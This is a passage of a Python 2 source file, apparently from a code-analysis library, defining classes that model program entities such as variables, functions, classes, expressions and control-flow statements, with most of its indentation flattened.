"""This class represents a program variable.
A variable typically has a name, a type (`result`) and a value
(or `None` for variables without a value or when the value is unknown).
Additionally, a variable has an `id` which uniquely identifies it in
the program (useful to resolve references), a list of references to it
and a list of statements that write new values to the variable.
If the variable is a *member*/*field*/*attribute* of an object,
`member_of` should contain a reference to such object, instead of `None`.
"""
def __init__(self, scope, parent, id, name, result):
"""Constructor for variables.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this variable.
name (str): The name of the variable in the program.
result (str): The type of the variable in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.value = None
self.member_of = None
self.references = []
self.writes = []
@property
def is_definition(self):
return True
@property
def is_local(self):
"""Whether this is a local variable.
In general, a variable is *local* if its containing scope is a
statement (e.g. a block), or a function, given that the variable
is not one of the function's parameters.
"""
return (isinstance(self.scope, CodeStatement)
or (isinstance(self.scope, CodeFunction)
and self not in self.scope.parameters))
@property
def is_global(self):
"""Whether this is a global variable.
In general, a variable is *global* if it is declared directly under
the program's global scope or a namespace.
"""
return isinstance(self.scope, (CodeGlobalScope, CodeNamespace))
@property
def is_parameter(self):
"""Whether this is a function parameter."""
return (isinstance(self.scope, CodeFunction)
and self in self.scope.parameters)
@property
def is_member(self):
"""Whether this is a member/attribute of a class or object."""
return isinstance(self.scope, CodeClass)
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeEntity):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '{}{} {} = {}'.format(' ' * indent, self.result, self.name,
pretty_str(self.value))
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {} = ({})'.format(self.result, self.name, self.value)
class CodeFunction(CodeEntity, CodeStatementGroup):
"""This class represents a program function.
A function typically has a name, a return type (`result`), a list
of parameters and a body (a code block). It also has an unique `id`
that identifies it in the program and a list of references to it.
If a function is a method of some class, its `member_of` should be
set to the corresponding class.
"""
def __init__(self, scope, parent, id, name, result, definition=True):
"""Constructor for functions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this function.
name (str): The name of the function in the program.
result (str): The return type of the function in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.parameters = []
self.body = CodeBlock(self, self, explicit=True)
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a function definition or just a declaration."""
return self._definition is self
@property
def is_constructor(self):
"""Whether this function is a class constructor."""
return self.member_of is not None
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, (CodeStatement, CodeExpression))
self.body._add(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.parameters:
yield codeobj
for codeobj in self.body._children():
yield codeobj
def _afterpass(self):
"""Assign a function-local index to each child object and register
write operations to variables.
This should only be called after the object is fully built.
"""
if hasattr(self, '_fi'):
return
fi = 0
for codeobj in self.walk_preorder():
codeobj._fi = fi
fi += 1
if isinstance(codeobj, CodeOperator) and codeobj.is_assignment:
if codeobj.arguments and isinstance(codeobj.arguments[0],
CodeReference):
var = codeobj.arguments[0].reference
if isinstance(var, CodeVariable):
var.writes.append(codeobj)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
params = ', '.join(map(lambda p: p.result + ' ' + p.name,
self.parameters))
if self.is_constructor:
pretty = '{}{}({}):\n'.format(spaces, self.name, params)
else:
pretty = '{}{} {}({}):\n'.format(spaces, self.result,
self.name, params)
if self._definition is not self:
pretty += spaces + ' [declaration]'
else:
pretty += self.body.pretty_str(indent + 2)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
params = ', '.join(map(str, self.parameters))
return '[{}] {}({})'.format(self.result, self.name, params)
class CodeClass(CodeEntity):
"""This class represents a program class for object-oriented languages.
A class typically has a name, an unique `id`, a list of
members (variables, functions), a list of superclasses, and a list of
references.
If a class is defined within another class (inner class), it should
have its `member_of` set to the corresponding class.
"""
def __init__(self, scope, parent, id_, name, definition=True):
"""Constructor for classes.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this class.
name (str): The name of the class in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id_
self.name = name
self.members = []
self.superclasses = []
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a definition or a declaration of the class."""
return self._definition is self
def _add(self, codeobj):
"""Add a child (function, variable, class) to this object."""
assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass))
self.members.append(codeobj)
codeobj.member_of = self
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.members:
yield codeobj
def _afterpass(self):
"""Assign the `member_of` of child members and call
their `_afterpass()`.
This should only be called after the object is fully built.
"""
for codeobj in self.members:
if not codeobj.is_definition:
                if codeobj._definition is not None:
codeobj._definition.member_of = self
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'class ' + self.name
if self.superclasses:
superclasses = ', '.join(self.superclasses)
pretty += '(' + superclasses + ')'
pretty += ':\n'
if self.members:
pretty += '\n\n'.join(
c.pretty_str(indent + 2)
for c in self.members
)
else:
pretty += spaces + ' [declaration]'
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[class {}]'.format(self.name)
class CodeNamespace(CodeEntity):
"""This class represents a program namespace.
A namespace is a concept that is explicit in languages such as C++,
but less explicit in many others. In Python, the closest thing should
be a module. In Java, it may be the same as a class, or non-existent.
A namespace typically has a name and a list of children objects
(variables, functions or classes).
"""
def __init__(self, scope, parent, name):
"""Constructor for namespaces.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the namespace in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}namespace {}:\n'.format(spaces, self.name)
pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[namespace {}]'.format(self.name)
class CodeGlobalScope(CodeEntity):
"""This class represents the global scope of a program.
The global scope is the root object of a program. If there are no
better candidates, it is the `scope` and `parent` of all other objects.
It is also the only object that does not have a `scope` or `parent`.
"""
def __init__(self):
"""Constructor for global scope objects."""
CodeEntity.__init__(self, None, None)
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '\n\n'.join(
codeobj.pretty_str(indent=indent)
for codeobj in self.children
)
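# Illustrative sketch (not part of the original module): assembling a tiny
# program tree by hand with the classes above. The helper name, ids and names
# are invented; language front-ends normally populate these objects through the
# same _add calls.
def _example_program_tree():
    program = CodeGlobalScope()
    counter = CodeVariable(program, program, 'v#1', 'counter', 'int')
    counter.value = 0
    program._add(counter)
    getter = CodeFunction(program, program, 'f#1', 'get_counter', 'int')
    getter.parameters.append(CodeVariable(getter, getter, 'v#2', 'offset', 'int'))
    program._add(getter)
    # program.pretty_str() then renders the variable and function declarations.
    return program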
# ----- Expression Entities ---------------------------------------------------
class CodeExpression(CodeEntity):
"""Base class for expressions within a program.
Expressions can be of many types, including literal values,
operators, references and function calls. This class is meant
to be inherited from, and not instantiated directly.
An expression typically has a name (e.g. the name of the function
in a function call) and a type (`result`). Also, an expression should
indicate whether it is enclosed in parentheses.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for expressions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the expression in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.result = result
self.parenthesis = paren
@property
def function(self):
"""The function where this expression occurs."""
return self._lookup_parent(CodeFunction)
@property
def statement(self):
"""The statement where this expression occurs."""
return self._lookup_parent(CodeStatement)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return (' ' * indent) + '(' + self.name + ')'
return (' ' * indent) + self.name
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {}'.format(self.result, self.name)
class SomeValue(CodeExpression):
"""This class represents an unknown value for diverse primitive types."""
def __init__(self, result):
"""Constructor for unknown values."""
CodeExpression.__init__(self, None, None, result, result)
def _children(self):
"""Yield all the children of this object, that is no children."""
return iter(())
SomeValue.INTEGER = SomeValue("int")
SomeValue.FLOATING = SomeValue("float")
SomeValue.CHARACTER = SomeValue("char")
SomeValue.STRING = SomeValue("string")
SomeValue.BOOL = SomeValue("bool")
class CodeLiteral(CodeExpression):
"""Base class for literal types not present in Python.
This class is meant to represent a literal whose type is not numeric,
string or boolean, as bare Python literals are used for those.
A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`),
and could be enclosed in parentheses. It does not have a name.
"""
def __init__(self, scope, parent, value, result, paren=False):
"""Constructor for literals.
As literals have no name, a constant string is used instead.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (CodeExpression|CodeExpression[]): This literal's value.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, 'literal', result, paren)
self.value = value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return '{}({})'.format(' ' * indent, pretty_str(self.value))
return pretty_str(self.value, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {!r}'.format(self.result, self.value)
CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue,
CodeLiteral, CodeExpression)
CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral)
class CodeNull(CodeLiteral):
"""This class represents an indefinite value.
Many programming languages have their own version of this concept:
Java has null references, C/C++ NULL pointers, Python None and so on.
"""
def __init__(self, scope, parent, paren=False):
"""Constructor for null literals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
paren (bool): Whether the null literal is enclosed in parentheses.
"""
CodeLiteral.__init__(self, scope, parent, None, 'null', paren)
def _children(self):
"""Yield all the children of this object, that is no children.
This class inherits from CodeLiteral just for consistency with the
class hierarchy. It should have no children, thus an empty iterator
is returned.
"""
return iter(())
class CodeCompositeLiteral(CodeLiteral):
"""This class represents a composite literal.
A composite literal is any type of literal whose value is compound,
rather than simple. An example present in many programming languages
are list literals, often constructed as `[1, 2, 3]`.
A composite literal has a sequence of values that compose it
(`values`), a type (`result`), and it should indicate whether it is
enclosed in parentheses.
"""
def __init__(self, scope, parent, result, value=(), paren=False):
"""Constructor for a compound literal.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (iterable): The initial value sequence in this composition.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
try:
value = list(value)
except TypeError as te:
raise AssertionError(str(te))
CodeLiteral.__init__(self, scope, parent, value, result, paren)
@property
def values(self):
return tuple(self.value)
def _add_value(self, child):
"""Add a value to the sequence in this composition."""
self.value.append(child)
def _children(self):
"""Yield all direct children of this object."""
for value in self.value:
if isinstance(value, CodeEntity):
yield value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
values = '{{{}}}'.format(', '.join(map(pretty_str, self.value)))
if self.parenthesis:
return '{}({})'.format(indent, values)
return '{}{}'.format(indent, values)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {{{}}}'.format(self.result,
', '.join(map(repr, self.value)))
class CodeReference(CodeExpression):
"""This class represents a reference expression (e.g. to a variable).
A reference typically has a name (of what it is referencing),
and a return type.
If the referenced entity is known, `reference` should be set.
If the reference is a field/attribute of an object, `field_of`
should be set to that object.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for references.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the reference in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the reference is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.field_of = None
self.reference = None
def _set_field(self, codeobj):
"""Set the object that contains the attribute this is a reference of."""
assert isinstance(codeobj, CodeExpression)
self.field_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.field_of:
yield self.field_of
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
name = ('{}.{}'.format(self.field_of.pretty_str(), self.name)
if self.field_of else self.name)
return pretty.format(spaces, name)
def __str__(self):
"""Return a string representation of this object."""
return '#' + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.field_of:
return '[{}] ({}).{}'.format(self.result, self.field_of, self.name)
return '[{}] #{}'.format(self.result, self.name)
class CodeOperator(CodeExpression):
"""This class represents an operator expression (e.g. `a + b`).
Operators can be unary or binary, and often return numbers
or booleans. Some languages also support ternary operators.
Do note that assignments are often considered expressions,
and, as such, assignment operators are included here.
An operator typically has a name (its token), a return type,
and a tuple of its arguments.
"""
_UNARY_TOKENS = ("+", "-")
_BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=",
"==", "!=", "&&", "||", "=")
def __init__(self, scope, parent, name, result, args=None, paren=False):
"""Constructor for operators.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the operator in the program.
result (str): The return type of the operator in the program.
Kwargs:
args (tuple): Initial tuple of arguments.
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.arguments = args or ()
@property
def is_unary(self):
"""Whether this is a unary operator."""
return len(self.arguments) == 1
@property
def is_binary(self):
"""Whether this is a binary operator."""
return len(self.arguments) == 2
@property
def is_ternary(self):
"""Whether this is a ternary operator."""
return len(self.arguments) == 3
@property
def is_assignment(self):
"""Whether this is an assignment operator."""
return self.name == "="
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
if self.is_unary:
operator = self.name + pretty_str(self.arguments[0])
else:
operator = '{} {} {}'.format(pretty_str(self.arguments[0]),
self.name,
pretty_str(self.arguments[1]))
return pretty.format(indent, operator)
def __repr__(self):
"""Return a string representation of this object."""
if self.is_unary:
return '[{}] {}({})'.format(self.result, self.name,
self.arguments[0])
if self.is_binary:
return '[{}] ({}){}({})'.format(self.result, self.arguments[0],
self.name, self.arguments[1])
return '[{}] {}'.format(self.result, self.name)
class CodeFunctionCall(CodeExpression):
"""This class represents a function call.
A function call typically has a name (of the called function),
a return type, a tuple of its arguments and a reference to the
called function.
If a call references a class method, its `method_of` should be
set to the object on which a method is being called.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for function calls.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the function in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.full_name = name
self.arguments = ()
self.method_of = None
self.reference = None
@property
def is_constructor(self):
"""Whether the called function is a constructor."""
return self.result == self.name
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _set_method(self, codeobj):
"""Set the object on which a method is called."""
assert isinstance(codeobj, CodeExpression)
self.method_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.method_of:
yield self.method_of
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
args = ', '.join(map(pretty_str, self.arguments))
if self.method_of:
call = '{}.{}({})'.format(self.method_of.pretty_str(),
self.name, args)
elif self.is_constructor:
call = 'new {}({})'.format(self.name, args)
else:
call = '{}({})'.format(self.name, args)
return pretty.format(indent, call)
def __repr__(self):
"""Return a string representation of this object."""
args = ', '.join(map(str, self.arguments))
if self.is_constructor:
return '[{}] new {}({})'.format(self.result, self.name, args)
if self.method_of:
return '[{}] {}.{}({})'.format(self.result, self.method_of.name,
self.name, args)
return '[{}] {}({})'.format(self.result, self.name, args)
class CodeDefaultArgument(CodeExpression):
"""This class represents a default argument.
Some languages, such as C++, allow function parameters to have
default values when not explicitly provided by the programmer.
This class represents such omitted arguments.
A default argument has only a return type.
"""
def __init__(self, scope, parent, result):
"""Constructor for default arguments.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
result (str): The return type of the argument in the program.
"""
CodeExpression.__init__(self, scope, parent, '(default)', result)
# ----- Statement Entities ----------------------------------------------------
class CodeStatement(CodeEntity):
"""Base class for program statements.
Programming languages often define diverse types of statements
(e.g. return statements, control flow, etc.).
This class provides common functionality for such statements.
In many languages, statements must be contained within a function.
"""
def __init__(self, scope, parent):
"""Constructor for statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeEntity.__init__(self, scope, parent)
self._si = -1
@property
def function(self):
"""The function where this statement appears in."""
return self._lookup_parent(CodeFunction)
class CodeJumpStatement(CodeStatement):
"""This class represents a jump statement (e.g. `return`, `break`).
A jump statement has a name. In some cases, it may also have an
associated value (e.g. `return 0`).
"""
def __init__(self, scope, parent, name):
"""Constructor for jump statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.value = None
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeExpression):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
if self.value is not None:
return '{}{} {}'.format(indent, self.name, pretty_str(self.value))
return indent + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.value is not None:
return '{} {}'.format(self.name, str(self.value))
return self.name
class CodeExpressionStatement(CodeStatement):
"""This class represents an expression statement. It is only a wrapper.
Many programming languages allow expressions to be statements
on their own. A common example is the assignment operator, which
can be a statement on its own, but also returns a value when
contained within a larger expression.
"""
def __init__(self, scope, parent, expression=None):
"""Constructor for expression statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
expression (CodeExpression): The expression of this statement.
"""
CodeStatement.__init__(self, scope, parent)
self.expression = expression
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.expression, CodeExpression):
yield self.expression
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return pretty_str(self.expression, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return repr(self.expression)
class CodeBlock(CodeStatement, CodeStatementGroup):
"""This class represents a code block (e.g. `{}` in C, C++, Java, etc.).
Blocks are little more than collections of statements, while being
considered a statement themselves.
Some languages allow blocks to be implicit in some contexts, e.g.
an `if` statement omitting curly braces in C, C++, Java, etc.
This model assumes that control flow branches and functions always
have a block as their body.
"""
def __init__(self, scope, parent, explicit=True):
"""Constructor for code blocks.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
explicit (bool): Whether the block is explicit in the code.
"""
CodeStatement.__init__(self, scope, parent)
self.body = []
self.explicit = explicit
def statement(self, i):
"""Return the *i*-th statement of this block."""
return self.body[i]
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, CodeStatement)
codeobj._si = len(self.body)
self.body.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.body:
return '\n'.join(stmt.pretty_str(indent) for stmt in self.body)
else:
return (' ' * indent) + '[empty]'
def __repr__(self):
"""Return a string representation of this object."""
return str(self.body)
class CodeDeclaration(CodeStatement):
"""This class represents a declaration statement.
Some languages, such as C, C++ or Java, consider this special
kind of statement for declaring variables within a function,
for instance.
A declaration statement contains a list of all declared variables.
"""
def __init__(self, scope, parent):
"""Constructor for declaration statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.variables = []
def _add(self, codeobj):
"""Add a child (variable) to this object."""
assert isinstance(codeobj, CodeVariable)
self.variables.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.variables:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
return spaces + ', '.join(v.pretty_str() for v in self.variables)
def __repr__(self):
"""Return a string representation of this object."""
return str(self.variables)
class CodeControlFlow(CodeStatement, CodeStatementGroup):
"""Base class for control flow structures (e.g. `for` loops).
Control flow statements are assumed to have, at least, one branch
(a boolean condition and a `CodeBlock` that is executed when
the condition is met). Specific implementations may consider
more branches, or default branches (executed when no condition is met).
A control flow statement typically has a name.
"""
def __init__(self, scope, parent, name):
"""Constructor for control flow structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the control flow statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.condition = True
self.body = CodeBlock(scope, self, explicit=False)
def get_branches(self):
"""Return a list of branches, where each branch is a pair of
condition and respective body."""
return [(self.condition, self.body)]
def _set_condition(self, condition):
"""Set the condition for this control flow structure."""
assert isinstance(condition, CodeExpression.TYPES)
self.condition = condition
def _set_body(self, body):
"""Set the main body for this control flow structure."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.body = body
else:
self.body._add(body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return '{} {}'.format(self.name, self.get_branches())
class CodeConditional(CodeControlFlow):
"""This class represents a conditional (`if`).
A conditional is allowed to have a default branch (the `else` branch),
besides its mandatory one.
"""
def __init__(self, scope, parent):
"""Constructor for conditionals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, 'if')
self.else_body = CodeBlock(scope, self, explicit=False)
@property
def then_branch(self):
"""The branch associated with a condition."""
return self.condition, self.body
@property
def else_branch(self):
"""The default branch of the conditional."""
return True, self.else_body
def statement(self, i):
"""Return the *i*-th statement of this block.
Behaves as if the *then* and *else* branches were
concatenated, for indexing purposes.
"""
# ----- This code is just to avoid creating a new list and
# returning a custom exception message.
o = len(self.body)
n = o + len(self.else_body)
if i >= 0 and i < n:
if i < o:
return self.body.statement(i)
return self.else_body.statement(i - o)
elif i < 0 and i >= -n:
if i >= o - n:
return self.else_body.statement(i)
return self.body.statement(i - o + n)
raise IndexError('statement index out of range')
    def statement_after(self, i):
        """Return the statement after the *i*-th one, or `None`."""
        k = i + 1
        o = len(self.body)
        n = o + len(self.else_body)
        if k > 0:
            if k < o:
                return self.body.statement(k)
            if o <= k < n:
                return self.else_body.statement(k - o)
        if k < 0:
            if k < o - n and k >= -n:
                return self.body.statement(k - o + n)
            if k >= o - n:
                return self.else_body.statement(k)
        return None
def get_branches(self):
"""Return a list with the conditional branch and the default branch."""
        if self.else_body:
return [self.then_branch, self.else_branch]
return [self.then_branch]
def _add_default_branch(self, body):
"""Add a default body for this conditional (the `else` branch)."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.else_body = body
else:
self.else_body._add(body)
def __len__(self):
"""Return the length of both branches combined."""
return len(self.body) + len(self.else_body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
for codeobj in self.else_body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}if ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
if self.else_body:
pretty += '\n{}else:\n'.format(spaces)
pretty += self.else_body.pretty_str(indent=indent + 2)
return pretty
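def _example_conditional_indexing():
    # Illustrative sketch (added for documentation; not part of the original
    # library). It demonstrates that statement() indexes the then-branch and
    # the else-branch as one concatenated sequence, assuming None is an
    # acceptable scope/parent for a standalone demo.
    cond = CodeConditional(None, None)
    cond.body._add(CodeJumpStatement(None, None, 'break'))
    cond._add_default_branch(CodeJumpStatement(None, None, 'continue'))
    assert cond.statement(0).name == 'break'      # index 0: then-branch
    assert cond.statement(1).name == 'continue'   # index 1: else-branch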
class CodeLoop(CodeControlFlow):
"""This class represents a loop (e.g. `while`, `for`).
Some languages allow loops to define local declarations, as well
as an increment statement.
A loop has only a single branch, its condition plus the body
that should be repeated while the condition holds.
"""
def __init__(self, scope, parent, name):
"""Constructor for loops.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the loop statement in the program.
"""
CodeControlFlow.__init__(self, scope, parent, name)
self.declarations = None
self.increment = None
def _set_declarations(self, declarations):
"""Set declarations local to this loop (e.g. `for` variables)."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_increment(self, statement):
"""Set the increment statement for this loop (e.g. in a `for`)."""
assert isinstance(statement, CodeStatement)
self.increment = statement
statement.scope = self.body
def _children(self):
"""Yield all direct children of this object."""
if self.declarations:
yield self.declarations
if isinstance(self.condition, CodeExpression):
yield self.condition
if self.increment:
yield self.increment
for codeobj in self.body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
v = self.declarations.pretty_str() if self.declarations else ''
i = self.increment.pretty_str(indent=1) if self.increment else ''
pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeSwitch(CodeControlFlow):
"""This class represents a switch statement.
A switch evaluates a value (its `condition`) and then declares
at least one branch (*cases*) that execute when the evaluated value
is equal to the branch value. It may also have a default branch.
Switches are often one of the most complex constructs of programming
languages, so this implementation might be lackluster.
"""
def __init__(self, scope, parent):
"""Constructor for switches.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, "switch")
self.cases = []
self.default_case = None
def _add_branch(self, value, statement):
"""Add a branch/case (value and statement) to this switch."""
self.cases.append((value, statement))
def _add_default_branch(self, statement):
"""Add a default branch to this switch."""
self.default_case = statement
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}switch ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeTryBlock(CodeStatement, CodeStatementGroup):
"""This class represents a try-catch block statement.
`try` blocks have a main body of statements, just like regular blocks.
Multiple `catch` blocks may be defined to handle specific types of
exceptions.
